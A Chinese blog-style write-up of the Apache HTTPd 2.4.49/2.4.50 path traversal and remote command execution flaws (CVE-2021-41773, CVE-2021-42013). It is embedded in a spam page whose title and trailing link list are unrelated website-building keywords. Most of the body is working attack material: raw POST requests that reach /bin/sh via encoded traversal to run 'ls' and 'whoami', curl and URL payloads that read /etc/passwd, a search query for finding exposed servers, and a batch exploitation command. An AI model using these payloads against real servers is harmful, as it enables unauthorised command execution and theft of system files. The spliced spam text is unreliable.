当前位置: 首页 > news >正文

台州做网站建设单位建设网站的作用意义

台州做网站建设,单位建设网站的作用意义,江门网站建设方案,微网站开发平台系统软件给个关注#xff1f;宝儿#xff01; 给个关注#xff1f;宝儿#xff01; 给个关注#xff1f;宝儿#xff01; CVE-2021-41773漏洞描述#xff1a; Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新#xff0c;披…给个关注宝儿 给个关注宝儿 给个关注宝儿 CVE-2021-41773漏洞描述 Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善攻击者可构造恶意请求绕过补丁利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持攻击者可构造恶意请求执行命令控制服务器。 影响版本 Apache HTTPd 2.4.49/2.4.50版本 zoomeye语法 app:“apache web server 2.4.49 2.4.50” 复现过程 环境搭建 docker镜像 https://github.com/blasty/CVE-2021-41773 搭建效果 rce复现 抓包 poc: POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1 Host: your ip : port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 If-Modified-Since: Sat, 16 Oct 2021 07:06:04 GMT If-None-Match: 29cd-5ce72f1ed2f00-gzip Cache-Control: max-age0 Content-Length: 41echo Content-Type: text/plain; echo; lsPOST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1 Host: ip:port Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9 If-None-Match: 29cd-5ce4665e39700-gzip If-Modified-Since: Thu, 14 Oct 2021 01:57:16 GMT Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 12echo; whoamicurl curl --data echo;cat /etc/passwd http://ip:port/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh修复 建议使用Apache HTTPd 2.4.49 与Apache HTTPd 2.4.50 版本的服务器更新Apache HTTPd 版本至最新。 批量利用检测利用工具 可视化界面工具 Github地址 https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013 PocSuite3工具 批量 python3 .\cli.py -r .\pocs\20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py -f 1.txt --verifyCVE-2021-42013 目录穿越 漏洞成因 Apache HTTP Server 2.4.50版本对CVE-2021-41773的修复可以避免一次url编码导致的路径穿越但是由于在请求处理过程中还会调用ap_unescape_url函数对参数再次进行解码仍然会导致路径穿越。 在处理外部HTTP请求时会调用 ap_process_request_internal函数对url路径进行处理在该函数中首先会调用ap_normalize_path函数进行一次url解码之后会调用ap_unescape_url函数进行二次解码代码如下 触发 ip:port/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd看完点赞关注不迷路!!! 后续继续更新优质安全内容!!!
http://www.pierceye.com/news/286616/

相关文章:

  • 宣威网站wordpress把logo变大
  • 网站设计模式有哪些商城网站营销方案
  • mvc做的网站wordpress 新建php文件
  • 西安网站seo外包个人开发者
  • 注册网站需要visa怎么办济宁万达网站建设
  • niche网站建设wordpress安装文本编辑器
  • 网站建设三种方法免费的导航页
  • 微信到wordpress杭州网站怎么做seo
  • 沙田镇仿做网站网站加速器quickq
  • 武进网站建设医药公司网站建设
  • 专业做网站建设广告设计网站素材
  • 成都建设银行保安招聘网站深圳做兼职的网站设计
  • 做网站如何找广告商湖南网站建设kaodezhu
  • 宁波专业的网站搭建公司天津网站建设技术托管
  • 做水果网站特点分析报告怎样在百度上注册自己的公司
  • 800元五合一建站上海企业排行榜
  • 学校建设网站前的市场分析上海到北京火车时刻表查询
  • 科技企业网站设计网站开发费如何入账
  • 网站主体必须要与域名注册人相同网页设计尺寸标准
  • wordpress建淘宝客网站吗网站建设与维护技术浅谈论文
  • 网站建设 技术方案网站建设的指导书
  • ps网站首页怎么做google 浏览器
  • 网站建设数据库软件制作公司宣传片哪家好
  • 高端建站模版大兴模版网站建设哪家好
  • 帝国cms怎样做网站迁移西安网站设计公司排名
  • 网站建设三折页做僾网站
  • 长沙的网站建设公司上海做网站的哪家好
  • 网站开发做什么网站建设银行北京冬奥会纪念币发行时间
  • 企业怎么建设网站网站建设与管理计划
  • 域名怎么制作网站旅游线路设计方案模板